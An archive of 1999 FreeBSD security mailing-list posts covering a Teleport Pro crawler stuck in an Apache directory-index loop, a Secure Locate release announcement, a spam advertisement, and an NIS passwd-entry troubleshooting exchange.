From: Marco Pizzi Subject: Re: Net abuse/DOS with Teleport Pro ? Cc: freebsd-security@freebsd.org In-Reply-To: <199906041843.EAA08014@mail.aussie.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >During two periods over two days, a person using a agent that identified >itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web >server (at a rate of roughly one per second), repeatedly asking for the same >(or similar) rubbish URL, as such ... >[cut] >I have not used this software and am unaware of its abilities Teleport Pro is a program like wget. Its main purpose is to download web-sites. I know that is limit is that it can launch up to 10 simultaneously thread. Teleport has many netiquette oriented options. Moreover it can impersonate another program, so you were lucky: the user didn't change this option.. Let me know if you want more information. -- Marco Pizzi. (marcolin) marcolin@net-one.it To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 16:40: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 8ABCD1509E for ; Fri, 4 Jun 1999 16:39:52 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from rainbow5.scientia.demon.co.uk ([192.168.1.2] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.02 #1) id 10q1Nl-0005eQ-00; Fri, 04 Jun 1999 22:20:05 +0100 (envelope-from ben@rainbow5.scientia.demon.co.uk) Received: from rainbow5.scientia.demon.co.uk (ident=ben) by rainbow5.scientia.demon.co.uk with local (Exim 3.02 #1) id 10q1Ni-00061P-00; Fri, 04 Jun 1999 22:20:02 +0100 (envelope-from ben@rainbow5.scientia.demon.co.uk) Date: Fri, 4 Jun 1999 22:20:02 +0100 From: Ben Smithurst To: Chris Cc: security@FreeBSD.ORG Subject: Re: Net abuse/DOS with Teleport Pro ? Message-ID: <19990604222002.A23089@rainbow5.scientia.demon.co.uk> References: <199906041843.EAA08014@mail.aussie.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199906041843.EAA08014@mail.aussie.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Chris wrote: > During two periods over two days, a person using a agent that identified > itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web > server (at a rate of roughly one per second), repeatedly asking for the same > (or similar) rubbish URL, as such ... > > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M > > and a number of variations of this. All came from the same IP address. > > I have not used this software and am unaware of its abilities, but I am > amazed that any responsible firm would distribute software that could be so > easily abused in this way. What it is doing seems, to me, to be either a user > doing something silly, or a bug in teleport pro (more likely the latter). Teleport Pro is a program which fetches websites by following all links to a certain depth, for offline viewing. Looks like it got caught in one of Apache's directory indexes and got confused. I'd say it's a bug in Teleport Pro, not interpreting the links properly, and not any deliberate abuse. -- Ben Smithurst ben@scientia.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 4 22: 2:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from bcgrizzly.com (bcgrizzly.com [207.34.136.10]) by hub.freebsd.org (Postfix) with SMTP id DC3F414F88 for ; Fri, 4 Jun 1999 22:02:57 -0700 (PDT) (envelope-from forger@bcgrizzly.com) Received: (qmail 15997 invoked from network); 5 Jun 1999 04:54:58 -0000 Received: from bcgrizzly.com (forger@207.34.136.10) by bcgrizzly.com with SMTP; 5 Jun 1999 04:54:58 -0000 Date: Fri, 4 Jun 1999 21:54:58 -0700 (PDT) From: Brook Miles To: Chris Cc: "security@FreeBSD.ORG" Subject: Re: Net abuse/DOS with Teleport Pro ? In-Reply-To: <199906041843.EAA08014@mail.aussie.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 5 Jun 1999, Chris wrote: > Upon processing my logs for the past few days, I noted an anamoly with regard > to one particular directory. I checked out the logs manually. > > During two periods over two days, a person using a agent that identified > itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web > server (at a rate of roughly one per second), repeatedly asking for the same > (or similar) rubbish URL, as such ... > > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A > /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M > > and a number of variations of this. All came from the same IP address. > > I have not used this software and am unaware of its abilities, but I am > amazed that any responsible firm would distribute software that could be so > easily abused in this way. What it is doing seems, to me, to be either a user > doing something silly, or a bug in teleport pro (more likely the latter). > > Anyone seen this ? > > -- Chris If you view the /Docs/ directory with a web-browser you will likely be presented with the directory listing and automatically generated links labeled "Name", "Last Modified" and so on above the columns...clicking on "Name" for example links to /Docs/?N=D which will give you the same list but sorted by name in descending order. The websucker this person is using has put itself into a possibly infinite loop, recursivly following the links to the same page...only sorted differently each time. Also it appearently doesn't properly understand relative urls of the type "?N=A" as it is appending them each time instead of replacing them. This is something the vender should seriously consider fixing. Whoever is running the program should have imposed a limit on the depth of recursive retreivals or the number of pages it would download. This is deffinitely a very silly thing on the part of the user. +--- | Brook Miles | A spec of cosmic dust... with attitude. +-------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 5:17:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from baerenklau.de.freebsd.org (baerenklau.de.freebsd.org [195.185.195.14]) by hub.freebsd.org (Postfix) with ESMTP id 7BE2814FF0 for ; Sat, 5 Jun 1999 05:17:07 -0700 (PDT) (envelope-from w@panke.de.freebsd.org) Received: (from uucp@localhost) by baerenklau.de.freebsd.org (8.8.8/8.8.8) with UUCP id OAA24450; Sat, 5 Jun 1999 14:16:50 +0200 (CEST) (envelope-from w@panke.de.freebsd.org) Received: (from w@localhost) by paula.panke.de.freebsd.org (8.9.3/8.8.8) id NAA02480; Sat, 5 Jun 1999 13:45:02 +0200 (CEST) (envelope-from w) Message-ID: <19990605134502.43573@panke.de.freebsd.org> Date: Sat, 5 Jun 1999 13:45:02 +0200 From: Wolfram Schneider To: Marco Pizzi , Chris Cc: freebsd-security@FreeBSD.ORG Subject: Re: Net abuse/DOS with Teleport Pro ? References: <199906041843.EAA08014@mail.aussie.org> <4.1.19990605002350.0428cd30@pop-sa.net-one.it> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89i In-Reply-To: <4.1.19990605002350.0428cd30@pop-sa.net-one.it>; from Marco Pizzi on Sat, Jun 05, 1999 at 12:41:10AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1999-06-05 00:41:10 +0200, Marco Pizzi wrote: > >During two periods over two days, a person using a agent that identified > >itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web > >server (at a rate of roughly one per second), repeatedly asking for the same > >(or similar) rubbish URL, as such ... > >[cut] > > >I have not used this software and am unaware of its abilities > > Teleport Pro is a program like wget. > Its main purpose is to download web-sites. > I know that is limit is that it can launch up to 10 simultaneously thread. > Teleport has many netiquette oriented options. like ignoring the /robots.txt file ;-(( Teleport is blacklisted for /cgi/ at www.freebsd.org Wolfram > Moreover it can impersonate another program, so you were lucky: the user > didn't change this option.. > Let me know if you want more information. -- Wolfram Schneider http://wolfram.schneider.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 6:52:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.ccia.cc (aic-gw.mlink.net [209.104.118.65]) by hub.freebsd.org (Postfix) with SMTP id 88DBD15183 for ; Sat, 5 Jun 1999 06:52:48 -0700 (PDT) (envelope-from matt@mlink.net) Received: (qmail 6727 invoked by uid 1001); 5 Jun 1999 13:52:46 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 5 Jun 1999 13:52:46 -0000 Date: Sat, 5 Jun 1999 09:52:46 -0400 (EDT) From: matt To: FreeBSD-SECURITY Subject: slocate v1.6 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks to Kevin Lindsay and his willingness to work with me. Secure Locate v1.6 is now FreeBSD compatible =) I originally worked up a patch for 1.5, together we cleaned it all up and it was included in the 1.6 release. For those who do not know what secure locate is, it is a replacement for GNU locate, fixes many security problems and is faster (imho) then locate. It also does not allow a user to see any files that they don't have permission to read, ie; A user can't do "locate root" and see everything in root's home dir.. or so on.. It installs binary to /usr/bin, moves "locate" to locate.old then links slocate to locate. It also places a link in /usr/libexec called "updatedb" use this command from your cron scripts or whatnot to update the slocate database which is stored in /var/db/slocate. It can be downloaded from the following sites: FTP: ftp.mkintraweb.com/pub/linux/slocate/ FTP2: ftp://ftp.fu-berlin.de/pub/unix/security/slocate/ I hope you find this of use =) Matt -- DISCLAIMER: Anyone sending me unsolicited commercial electronic mail will be charged a $100 fee for time spent reading it. Do NOT send this type of electronic mail to me. In reading this, you automatically agree to be subjected to these terms: US Code Title 47, Sec.227(a)(2)(B), a computer/modem/printer meets the definition of a telephone fax machine. By Sec.227(b)(1)(C), it is unlawful to send any unsolicited advertisement to such equipment. By Sec.227(b)(3)(C), a violation of the aforementioned Section is punishable by action to recover actual monetary loss, or $500, whichever is greater, for each violation. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 6:56:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.aussie.org (hallam.lnk.telstra.net [139.130.54.166]) by hub.freebsd.org (Postfix) with ESMTP id 7594B14CE1 for ; Sat, 5 Jun 1999 06:56:53 -0700 (PDT) (envelope-from cconel@aussie.org) Received: from frankenputer (dialup-b1-29.aussie.org [203.29.75.73]) by mail.aussie.org (8.9.0/8.9.0) with SMTP id XAA09263 for ; Sat, 5 Jun 1999 23:56:50 +1000 (EST) Message-Id: <199906051356.XAA09263@mail.aussie.org> From: "Chris " To: "freebsd-security@FreeBSD.ORG" Date: Sat, 05 Jun 1999 23:57:51 +1000 Reply-To: "Chris" X-Mailer: PMMail 98 Standard (2.01.1600) For Windows NT (4.0.1381;4) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: Net abuse/DOS with Teleport Pro ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 4 Jun 1999 21:54:58 -0700 (PDT), Brook Miles wrote: >If you view the /Docs/ directory with a web-browser you will likely be >presented with the directory listing and automatically generated links >labeled "Name", "Last Modified" and so on above the columns...clicking on >"Name" for example links to /Docs/?N=D which will give you the same list >but sorted by name in descending order. Aha ... now I know where the ?N=D and suchlike rubbish is coming from. From what I can tell, then, Teleport Pro is evidently so bug-infested that it can't tell it's arse from its head. Or something like that. Sigh. While I could just ban teleport pro agents from the site, then the users would just tell it to impersonate something else. Sounds like I need to think about writing an apache module that's smart enough to spot patterns of abuse and cut them off (has anyone already done this?). ['Patterns of abuse'. Like automatically cutting off someone like the kind user at fluke.com who recently decided to grab one of our entire sites, along with about 2gb of image files, by setting up some software (unknown) to make roughly 60 concurrent HTTP connections. The fluke folks told me that they used NAT at their firewall and 'didn't keep logs', and so couldn't reprimand the user responsible. Sigh.] -- Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 16:44:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from pokey.local.net (tcs4-58.arl.netwalk.net [216.69.200.250]) by hub.freebsd.org (Postfix) with ESMTP id 0B0CA151FE for ; Sat, 5 Jun 1999 16:44:36 -0700 (PDT) (envelope-from jmutter@netwalk.com) Received: from insomnia.local.net (insomnia.local.net [192.168.2.3]) by pokey.local.net (8.9.2/8.9.2) with ESMTP id TAA08802 for ; Sat, 5 Jun 1999 19:44:33 -0400 (EDT) (envelope-from jmutter@insomnia.local.net) Date: Sat, 5 Jun 1999 19:48:10 -0400 (EDT) From: "James A. Mutter" Reply-To: jmutter@netwalk.com To: freebsd-security@freebsd.org Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe jm7996@devrycols.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 16:46:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.noc.netcom.net (mail1.noc.netcom.net [204.31.1.150]) by hub.freebsd.org (Postfix) with ESMTP id 883A6150EA for ; Sat, 5 Jun 1999 16:46:58 -0700 (PDT) (envelope-from kprater@industrysearch.com) Received: from webserver.industrysearch.com (webserver.industrysearch.com [207.95.128.10]) by mail1.noc.netcom.net (8.9.1/8.9.1/(NETCOM v2.00)) with ESMTP id QAA16034 for ; Sat, 5 Jun 1999 16:46:56 -0700 (PDT) Message-Id: <199906052346.QAA16034@mail1.noc.netcom.net> Received: from PB-S607 by webserver.industrysearch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1458.49) id L9MBWCXH; Sat, 5 Jun 1999 19:38:20 -0400 To: freebsd-security@FreeBSD.ORG From: "Ken Prater, IndustrySearch.Com" Date: Sat, 5 Jun 99 19:47:58 +0000 Subject: "Link Your Web Site" To IndustrySearch.Com X-Mailer: WM - IndustrySearch.Com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Increase traffic to your company's web site with a FREE Hyperlink to IndustrySearch.Com. Thousands of industrial purchasing agents, buyers, engineers and others searching for suppliers and services can locate your business easily with our USA Industrial Directory. You can visit IndustrySearch.Com at http://industrysearch.com "Link Your Web Site" to our USA Industrial Directory Data Base today! Visit IndustrySearch.Com at http://industrysearch.com and click on "Link Your Web Site" Thank you, K. Prater USA INDUSTRIAL DATA BASE MANAGEMENT To be removed from our mailing list, please click Reply and type "REMOVE" in the subject field To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 21:56:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3b169.neo.rr.com [24.93.181.169]) by hub.freebsd.org (Postfix) with ESMTP id E770414E64 for ; Sat, 5 Jun 1999 21:56:13 -0700 (PDT) (envelope-from mike@argos.org) Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA02831 for ; Sun, 6 Jun 1999 01:01:48 -0400 Date: Sun, 6 Jun 1999 01:01:48 -0400 (EDT) From: Mike Nowlin To: freebsd-security@freebsd.org Subject: NIS strangeness Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If this has been answered, smack me and tell me where to find the answer -- I can't..... Built a new 3.1-RELEASE machine to replace a 2.8-STABLE one -- moved all the important stuff over, and ran into a problem with NIS: As "mike" (my normal user) on the new box, "finger kathleen" works fine -- returns all the user data from the NIS server without any problems. When "mike" is su'd "root", "finger kathleen" returns "no such user". But when "mike" is su'd "root", "ypcat passwd" returns the full NIS password file as it should. Can't log in as "kathleen", either. Is this something dumb I'm not noticing, or is a "feature"? Thanks -- Mike mike@argos.org mike@viewsnet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 22:25:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id C704914D10 for ; Sat, 5 Jun 1999 22:25:51 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.224]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA28347; Sat, 5 Jun 1999 23:25:42 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <375A0656.20DC59A7@softweyr.com> Date: Sat, 05 Jun 1999 23:25:42 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Mike Nowlin Cc: freebsd-security@FreeBSD.ORG Subject: Re: NIS strangeness References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Nowlin wrote: > > Built a new 3.1-RELEASE machine to replace a 2.8-STABLE one -- moved all > the important stuff over, and ran into a problem with NIS: > > As "mike" (my normal user) on the new box, "finger kathleen" works fine -- > returns all the user data from the NIS server without any problems. Did you add the +::::::: entry to the passwd file? Be sure to do group as well, if that's the problem. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 22:29:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3b169.neo.rr.com [24.93.181.169]) by hub.freebsd.org (Postfix) with ESMTP id 5C6AC14D10 for ; Sat, 5 Jun 1999 22:29:44 -0700 (PDT) (envelope-from mike@argos.org) Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA02937; Sun, 6 Jun 1999 01:34:27 -0400 Date: Sun, 6 Jun 1999 01:34:26 -0400 (EDT) From: Mike Nowlin To: Wes Peters Cc: freebsd-security@FreeBSD.ORG Subject: Re: NIS strangeness In-Reply-To: <375A0656.20DC59A7@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Did you add the +::::::: entry to the passwd file? > Be sure to do group as well, if that's the problem. ;^) Used "vipw" to add it into /etc/master.passwd, and /etc/passwd now hsa +:*::::: in it..... Seems OK there..... :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 23:24:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6708614CBE for ; Sat, 5 Jun 1999 23:24:18 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.224]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id AAA28437; Sun, 6 Jun 1999 00:24:13 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <375A140C.5ABCA08D@softweyr.com> Date: Sun, 06 Jun 1999 00:24:12 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Mike Nowlin Cc: freebsd-security@FreeBSD.ORG Subject: Re: NIS strangeness References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Nowlin wrote: > > > > > Did you add the +::::::: entry to the passwd file? > > Be sure to do group as well, if that's the problem. ;^) > > Used "vipw" to add it into /etc/master.passwd, and /etc/passwd now hsa > +:*::::: in it..... Seems OK there..... :) I'm not so sure about that *. If "ypmatch -k username passwd" works, the network transport and NIS parts are working just fine. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 5 23:35:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 69F4414BD0 for ; Sat, 5 Jun 1999 23:35:20 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id QAA05894; Sun, 6 Jun 1999 16:32:17 +1000 Date: Sun, 6 Jun 1999 16:32:17 +1000 (EST) From: Nicholas Brawn To: Wes Peters Cc: Mike Nowlin , freebsd-security@FreeBSD.ORG Subject: Re: NIS strangeness In-Reply-To: <375A0656.20DC59A7@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 5 Jun 1999, Wes Peters wrote: > Mike Nowlin wrote: > > > > Built a new 3.1-RELEASE machine to replace a 2.8-STABLE one -- moved all > > the important stuff over, and ran into a problem with NIS: > > > > As "mike" (my normal user) on the new box, "finger kathleen" works fine -- > > returns all the user data from the NIS server without any problems. > > Did you add the +::::::: entry to the passwd file? > Be sure to do group as well, if that's the problem. ;^) Correct me if i'm wrong, but isn't that a security hazard? Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message